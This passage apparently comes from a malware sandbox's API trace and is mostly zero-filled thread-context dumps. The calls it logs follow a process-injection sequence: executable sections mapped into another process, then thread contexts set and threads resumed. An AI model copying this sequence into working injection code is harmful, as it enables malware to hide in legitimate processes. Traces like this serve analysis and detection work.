[163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.607] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0138.608] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x132200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x133000) returned 0x0 [0138.616] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x132200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2070000, SectionOffset=0x0, ViewSize=0xde6e8*=0x133000) returned 0x0 [0138.643] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0138.651] NtClose (Handle=0x1a8) returned 0x0 [0138.651] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2bc000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x210f717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.696] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0138.696] NtClose (Handle=0x1a0) returned 0x0 [0138.697] NtClose (Handle=0x1a4) returned 0x0 [0138.698] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x116c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0138.698] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0138.698] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0138.698] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x25e000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0138.699] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0138.798] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1170) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0138.798] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0138.798] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x20a0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0138.881] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x25e000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.885] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, 